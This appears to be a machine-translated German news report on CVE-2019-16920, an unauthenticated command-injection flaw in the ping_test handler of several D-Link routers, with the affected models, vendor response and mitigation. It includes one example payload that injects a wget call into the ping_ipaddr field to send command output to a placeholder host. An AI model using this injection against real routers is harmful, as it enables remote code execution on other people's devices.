Aus der Ferne ausnutzbare Sicherheitslücke in D-Link-Routern

In D-Link-WLAN-Routern identifiziert gefährliche Schwachstelle (CVE-2019–16920), mit dem Sie Code auf der Geräteseite aus der Ferne ausführen können, indem Sie eine spezielle Anfrage an den „ping_test“-Handler senden, auf den ohne Authentifizierung zugegriffen werden kann.

Interessanterweise sollte der „ping_test“-Aufruf nach Angaben der Firmware-Entwickler erst nach der Authentifizierung ausgeführt werden, in Wirklichkeit wird er jedoch auf jeden Fall aufgerufen, unabhängig von der Anmeldung am Webinterface. Insbesondere beim Zugriff auf das apply_sec.cgi-Skript und der Übergabe des Parameters „action=ping_test“ leitet das Skript zur Authentifizierungsseite weiter, führt aber gleichzeitig die mit ping_test verbundene Aktion aus. Um den Code auszuführen, wurde eine weitere Schwachstelle in ping_test selbst ausgenutzt, die das Ping-Dienstprogramm aufruft, ohne die Richtigkeit der zum Testen gesendeten IP-Adresse ordnungsgemäß zu überprüfen. Um beispielsweise das Dienstprogramm wget aufzurufen und die Ergebnisse des Befehls „echo 1234“ an einen externen Host zu übertragen, geben Sie einfach den Parameter „ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://“ an. test.test/?$( echo 1234)".

Aus der Ferne ausnutzbare Sicherheitslücke in D-Link-Routern

Das Vorhandensein der Sicherheitslücke wurde in den folgenden Modellen offiziell bestätigt:

  • DIR-655 mit Firmware 3.02b05 oder älter;
  • DIR-866L mit Firmware 1.03b04 oder älter;
  • DIR-1565 mit Firmware 1.01 oder älter;
  • DIR-652 (es werden keine Informationen zu problematischen Firmware-Versionen bereitgestellt)

Der Supportzeitraum für diese Modelle sei bereits abgelaufen, so D-Link sagte,, das keine Updates zur Behebung der Schwachstelle veröffentlicht, rät von deren Verwendung ab und empfiehlt, sie durch neue Geräte zu ersetzen. Um die Sicherheit zu umgehen, können Sie den Zugriff auf die Weboberfläche nur auf vertrauenswürdige IP-Adressen beschränken.

Später stellte sich heraus, dass die Sicherheitslücke ebenfalls bestand wirkt Modelle DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 und DIR-825, Pläne für die Veröffentlichung von Updates sind noch nicht bekannt.

Source: opennet.ru

Kommentar hinzufügen